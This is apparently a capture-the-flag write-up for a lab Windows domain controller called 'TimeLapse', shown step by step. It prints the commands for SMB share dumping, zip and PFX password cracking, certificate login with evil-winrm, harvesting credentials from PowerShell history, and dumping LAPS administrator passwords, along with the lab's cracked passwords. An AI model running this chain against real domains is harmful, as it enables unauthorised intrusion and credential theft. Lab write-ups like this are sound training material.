TimeLapse - Writeup - Konstantinovitz

## Summary --- ## External Unauthenticated Access ### Remote Services ```sh nmap -sV -sC -vvv -oN remote-services-base.nmap $RHOST nmap -p- -sV -vvv -oN remote-services-all-ports.nmap $RHOST ``` ### SMB | Attribute | Value | | ------------- | ---------------------------------------- | | signing | true | | SMBv1 | false | | ARCH | x64 | | OS/build | Windows 10 / Server 2019 Build 17763 x64 | | name | DC01 | | guest | true, can list shares | | [[RID Brute]] | false | | null session | true | #### Share Dumping ```sh nxc smb $RHOST -u 'guest' -p '' -M spider_plus -o DOWNLOAD_FLAG=True mv /tmp/nxc_hosted/nxc_spider_plus/$RHOST ./SMB-DUMP ``` ```sh ╭─[λ]-[~/targets/timelapse/guest]-[10.10.11.152] ╰─> tree . └── SMB-DUMP └── Shares └── Dev └── winrm_backup.zip ``` Attempting to unzip the file results in a password prompt: ``` ╭─[λ]-[~/targets/timelapse/guest]-[10.10.11.152] ╰─> unzip winrm_backup.zip Archive: winrm_backup.zip [winrm_backup.zip] legacyy_dev_auth.pfx password: ``` Given that the zip is prompting for a password, it follows that there must be a password hash hidden somewhere inside said zip file which may be extracted: ```sh zip2john winrm_backup.zip > win_backup_zip.hash ╭─[λ]-[~/targets/timelapse/guest] ╰─> ~/arsenal/sources/john/run/john win_backup_zip.hash --wordlist=~/arsenal/wordslists/rockyou.txt --show ╭─[λ]-[~/targets/timelapse/guest] ╰─> ~/arsenal/sources/john/run/john win_backup_zip.hash --show winrm_backup.zip/legacyy_dev_auth.pfx:supremelegacy:legacyy_dev_auth.pfx:winrm_backup.zip::winrm_backup.zip ``` we got a password: `supremelegacy` which we'll paste into the `unzip win_backup.zip` password prompt. Next up we'll have to crack the [[Personal Information Exchange (PFX) Files]] file: ```sh ╭─[λ]-[~/targets/timelapse/guest] ╰─> john --wordlist=~/arsenal/wordlists/rockyou.txt legaccy_dev_auth_pfx.hash Using default input encoding: UTF-8 Loaded 1 password hash (pfx, (.pfx, .p12) [PKCS#12 PBE (SHA1/SHA2) 256/256 AVX2 8x]) Cracked 1 password hash (is in /home/noctua/arsenal/sources/john/run/john.pot), use "--show" No password hashes left to crack (see FAQ) ╭─[λ]-[~/targets/timelapse/guest] ╰─> john --wordlist=~/arsenal/wordlists/rockyou.txt legaccy_dev_auth_pfx.hash ╭─[λ]-[~/targets/timelapse/guest] ╰─> john --show legaccy_dev_auth_pfx.hash legacyy_dev_auth.pfx:thuglegacy:::::legacyy_dev_auth.pfx 1 password hash cracked, 0 left ``` And we end up with `thuglegacy`. Finally I'll extract the priate/public keypairs from the `.pfx` file: ```sh ╭─[λ]-[~/targets/timelapse/guest] ╰─> openssl pkcs12 -in legacyy_dev_auth.pfx -nocerts -nodes -out legacyy_dev_auth_private_key.pem Enter Import Password: ╭─[λ]-[~/targets/timelapse/guest] ╰─> openssl pkcs12 -in legacyy_dev_auth.pfx -clcerts -nokeys -out legaccy_dev_auth_certificate.pem ``` Lastly we'll connect using [[Evil-WinRM]]: ```sh evil-winrm -i $RHOST -c legaccy_dev_auth_certificate.pem -k legacyy_dev_auth_private_key.pem ``` And we are now authenticated as the user `legacyy` --- ## Internal Authenticated Access `legacyy` ### Execution of [[Winpeas]] ```txt ╔══════════╣ PowerShell Settings PowerShell v2 Version: 2.0 PowerShell v5 Version: 5.1.17763.1 PowerShell Core Version: Transcription Settings: Module Logging Settings: Scriptblock Logging Settings: PS history file: C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt PS history size: 434B ╔══════════╣ Looking for AutoLogon credentials Some AutoLogon credentials were found DefaultDomainName : TIMELAPSE ╔══════════╣ Searching hidden files or folders in C:\Users home (can be slow) C:\Users\Default C:\Users\Default User C:\Users\Default C:\Users\All Users C:\Users\All Users C:\Users\All Users\ntuser.pol ``` - We note that [[LAPS - Local Administrator Password Solution]] is enabled. ![[Pasted image 20250210191210.png]] - I note that there's a PS History file at: `C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt` #### Powershell History File - I note that there's a PS History file at: `` ``` cat C:\Users\legacyy\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt whoami ipconfig /all netstat -ano |select-string LIST $so = New-PSSessionOption -SkipCACheck -SkipCNCheck -SkipRevocationCheck $p = ConvertTo-SecureString 'E3R$Q62^12p7PLlC%KWaxuaV' -AsPlainText -Force $c = New-Object System.Management.Automation.PSCredential ('svc_deploy', $p) invoke-command -computername localhost -credential $c -port 5986 -usessl - SessionOption $so -scriptblock {whoami} get-aduser -filter * -properties * exit ``` seems we got ourselves another credential: `svc_deploy:E3R$Q62^12p7PLlC%KWaxuaV`. --- ## Lateral Movement `legacyy` -> `svc_deploy` We authenticate using [[Evil-WinRM]]. ```sh ╭─[λ]-[~/targets/timelapse/svc_deploy] ╰─> evil-winrm -i $RHOST -u 'svc_deploy' -p 'E3R$Q62^12p7PLlC%KWaxuaV' -S ``` ### Bloodhound - we note that the `TRX` user is a `MemberOf` in the `Domain Admin`. - no kerberoastable users - no AS-REP Roastable users - no weird `DCSync` ### Manual Enumeration ```powershell *Evil-WinRM* PS C:\> whoami /all ... GROUPS: TIMELAPSE\LAPS_Readers Group ... ``` This may indicate that we can dump [[LAPS - Local Administrator Password Solution]]. ### Dumping LAPS ```powershell *Evil-WinRM* PS C:\> Get-ADComputer -Filter * -Properties ms-Mcs-AdmPwd | Select Name, ms-Mcs-AdmPwd Name ms-Mcs-AdmPwd ---- ------------- DC01 j46d60SqJy95MyvKV1Z4)5;3 DB01 WEB01 DEV01 ``` --- ## Privesc `svc_deploy` -> `Administrator` Aaaand we got `Administrator`: ```sh ╭─[λ]-[~/targets/timelapse/Administrator] ╰─> evil-winrm -i $RHOST -u 'Administrator' -p `j46d60SqJy95MyvKV1Z4)5;3` -S ``` --- ## Lessons Learned - Got to practice [[LAPS - Local Administrator Password Solution]] dumping - Got to drill things again - Got to mess around a lot with certificates and John The Ripper.